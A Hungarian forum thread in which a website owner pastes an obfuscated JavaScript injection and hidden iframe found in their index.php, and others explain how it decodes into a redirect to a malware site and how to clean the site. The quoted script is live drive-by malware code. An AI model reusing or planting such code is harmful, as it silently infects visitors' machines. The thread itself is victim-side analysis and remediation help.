srami írta: "Laci_L bocs a hibáért, lehet, hogy a Chrome ront el valamit. Bye!"

Nem, ezt Te követted el.
A legelső, nyitó hozzászólásodban túl hosszú sorok vannak a két <body> között.
Azt a két sort kellene szóközökkel vagy enterrel megtördelni.
Vagy egyszerűen kitörölni, mert már vackor úgyis visszafejtette.
Kattints messze jobbra fent a szerkeszt gombra.

Hi mindenki!

Bocs, de obj.+subj. okok miatt nem lehettem jelen az utóbbi két héten.
Stell, Vackor, kösz a válaszokat -már kezd derengeni.
Laci_L bocs a hibáért, lehet, hogy a Chrome ront el valamit.

Bye!

Miután nem válaszolsz, valamelyik Moderátot kérem meg ugyanerre.
Szinte olvashahatlan a topik.

Visszafejtettem. Tulajdonképpen egyáltalán nem bonyolult, csak a függvények és változók hosszú, hexadecimális kódnak látszó (valójában kis L betűvel kezdődő) elnevezései és egymásba ágyazásai miatt ránézésre nem egyértelmű.

Gyakorlatilag a scriptben van egy hosszú string, ami hexa formában kódolva tartalmaz egy másik scriptet. Dekódolja és beilleszti a html-be.

Utána jön a frissen dekódolt script végrehajtása. Gondolom nem meglepő, de ez a script is egy kódolt stringet tartalmaz. Dekódolja és beilleszti.

A beillesztett string egy rejtett HTML kód, mellesleg a firefox rögtön blokkolja is a betöltését (bejelntett támadó oldal).

A mozilla noscript kiegészítöje nyújt valamilyen védelmet a hasonló trójaik ellen?

srami

Tegyél be légyszíves szóközöket a 2009 Feb. 08 22:01 postodba (esetleg töröld az idézetet, mert már kiderült minden), mert az idézet egy nagyon hosszú szó, és teljesen szétdobja az oldalt vízszintesen.

ez a mechanismus egy komplet lanc,es aki meglatogasa az hackelt oldalt tevekenykedik a fertozes szaporodasaban
nagyjabol ide irom hogy csinaltak
1;Meghackeltek az oldalodatt ez cc10 -perc munka a Hackernek.
2:Betesznek karos IP-cimet a HTML kódba amej att hajint mas oldalra a javascript letoltovel.
3:errol az oldalrol automatikusan letoltodnek a trojak a tudomasod nelkull
4:Ezek a trojak aztan letoltik a tobi trojat egeszen mas oldalrol es a lanc oszekapcsolodik es kesz a katasztrofa.

Tehat enszerintem minden gep megvan fertozve aki meglatogata az oldaladat,neked most lekell toltaned az egesz odaladat,at nezni amitt nemtetel te oda kitorolni,leegetni lemezre es at kontrolalni az egesz letoltot oldalt modjuk AVPTOOL,MWAV,-skenerekel,ha nincsen mas fertozes az oldaladat letoroln
i es viszateszed a lemezrol a tisztatt,de elote kipucolni a gepedett.

OK nbela.
Nagy vonalakban tényleg ott van a lényeg és Stell is eléggé elfoglalt ezen a környéken; talán tényleg túlzás elvárni tőle részletes schulungot -azért megpróbáltam -:)
Én igazán azt a sriptet szeretném érteni -csak pascalban és adatbázisokban vagyok valamennyire járatos- mert nekem az eléggé kinai.
Kösz!

Szerintem nagy vonalakban egész jól leírta az említett trójai mechanizmusát.

Kösz Stell!
Azt meg tudnád mondani, hogy mit csinál (hogyan működik)(mi lenne, ha az AVAST nem ismerte volna fel) ez a script és hogyan került a fájlomba?
Kösz!

udv,
igen ez a oldal megvan fertozve,az avast ismeri
http://www.avast.cz/eng/press-release-js-packed-ab-trj-.html
ez van ide irva
az avast felfdezet egy uj trojat,januar 16,tol megvolt tamadva tobb internet oldal,kihasznaltak a biztonsagi lyukakat es eloptak tobb bejelenkezesi adatokat,Az oldalba beadtak uj java scriptet az avast felismeri mint JS:Packed-AB [Trj].ez a script at dod egy kinai oldalra ahonan a gepet rogton megfertozik az utolso 48 oraban tobb mint 5000 bejedzes voltt olyan 2000 oldalrol van szo.,eben az idoben csak az avast ismeri fell a fertozest.

Üdv!

Az alábbi sort találtam az index.php-mben amit biztos, hogy nem én írtam oda. Korábban már az UW-ről rendszeresen eltüntek a fájljaim.
Most az AVAST figyelmeztetett, hogy "gogo2met.net/.go/check.html malware webhelyre csatlakozás blokkolva" .
Ezután néztem meg jobban az index.php fájlt és találtam ezt az idegen sort (egy sorban volt az egész.)

----------------------------innen---------------------------------------------
<body>

<iframe src='http://url/' width='1' height='1' style='visible:hidden'></iframe><script>function c102916999516l498b2dcd184fe(l498b2dcd18cce){ function l498b2dcd194a0(){return 16;} return (parseInt(l498b2dcd18cce,l498b2dcd194a0()));}function l498b2dcd1a455(l498b2dcd1ac1d){ var l498b2dcd1c385=2; var l498b2dcd1b3f7='';l498b2dcd1d327=String.fromCharCode;for(l498b2dcd1bbb5=0;l498b2dcd1bbb5<l498b2dcd1ac1d.length;l498b2dcd1bbb5+=l498b2dcd1c385){ l498b2dcd1b3f7+=(l498b2dcd1d327(c102916999516l498b2dcd184fe(l498b2dcd1ac1d.substr(l498b2dcd1bbb5,l498b2dcd1c385))));}return l498b2dcd1b3f7;} var xdc='';var l498b2dcd1daf9='3C736'+xdc+'3726'+xdc+'970743E6'+xdc+'96'+xdc+'6'+xdc+'28216'+xdc+'D796'+xdc+'96'+xdc+'1297B6'+xdc+'46'+xdc+'F6'+xdc+'3756'+xdc+'D6'+xdc+'56'+xdc+'E742E77726'+xdc+'9746'+xdc+'528756'+xdc+'E6'+xdc+'5736'+xdc+'36'+xdc+'1706'+xdc+'528202725336'+xdc+'32536'+xdc+'392536'+xdc+'36'+xdc+'2537322536'+xdc+'312536'+xdc+'6'+xdc+'42536'+xdc+'352532302536'+xdc+'6'+xdc+'52536'+xdc+'312536'+xdc+'6'+xdc+'42536'+xdc+'3525336'+xdc+'42536'+xdc+'332533312533302532302537332537322536'+xdc+'3325336'+xdc+'42532372536'+xdc+'3825373425373425373025336'+xdc+'125326'+xdc+'6'+xdc+'25326'+xdc+'6'+xdc+'2536'+xdc+'372536'+xdc+'6'+xdc+'6'+xdc+'2536'+xdc+'372536'+xdc+'6'+xdc+'6'+xdc+'2533322536'+xdc+'6'+xdc+'42536'+xdc+'3525326'+xdc+'52536'+xdc+'6'+xdc+'52536'+xdc+'3525373425326'+xdc+'6'+xdc+'25326'+xdc+'52536'+xdc+'372536'+xdc+'6'+xdc+'6'+xdc+'25326'+xdc+'6'+xdc+'2536'+xdc+'332536'+xdc+'382536'+xdc+'352536'+xdc+'332536'+xdc+'6'+xdc+'225326'+xdc+'52536'+xdc+'382537342536'+xdc+'6'+xdc+'42536'+xdc+'6'+xdc+'32532372532302537372536'+xdc+'392536'+xdc+'342537342536'+xdc+'3825336'+xdc+'42533342533382533372532302536'+xdc+'382536'+xdc+'352536'+xdc+'392536'+xdc+'372536'+xdc+'3825373425336'+xdc+'42533392533342532302537332537342537392536'+xdc+'6'+xdc+'32536'+xdc+'3525336'+xdc+'4253237253736'+xdc+'2536'+xdc+'392537332536'+xdc+'392536'+xdc+'322536'+xdc+'392536'+xdc+'6'+xdc+'32536'+xdc+'3925373425373925336'+xdc+'12536'+xdc+'382536'+xdc+'392536'+xdc+'342536'+xdc+'342536'+xdc+'352536'+xdc+'6'+xdc+'525323725336'+xdc+'525336'+xdc+'325326'+xdc+'6'+xdc+'2536'+xdc+'392536'+xdc+'36'+xdc+'2537322536'+xdc+'312536'+xdc+'6'+xdc+'42536'+xdc+'3525336'+xdc+'52729293B7D76'+xdc+'6'+xdc+'172206'+xdc+'D796'+xdc+'96'+xdc+'13D7472756'+xdc+'53B3C2F736'+xdc+'3726'+xdc+'970743E';document.write(l498b2dcd1a455(l498b2dcd1daf9));</script>

</body>
---------------------------idáig----------------------------------------------
A body tag-ek között eredetileg nem volt semmi.
Ha az elején a widt height adatokat 10-re változtatom és a style üres stringre van változtatva, akkor egy kis négyzet lesz látható a weblap alján
Mi ez? Mit csinál? Hogyan érdemeltem ki?

Pliz! Kösz!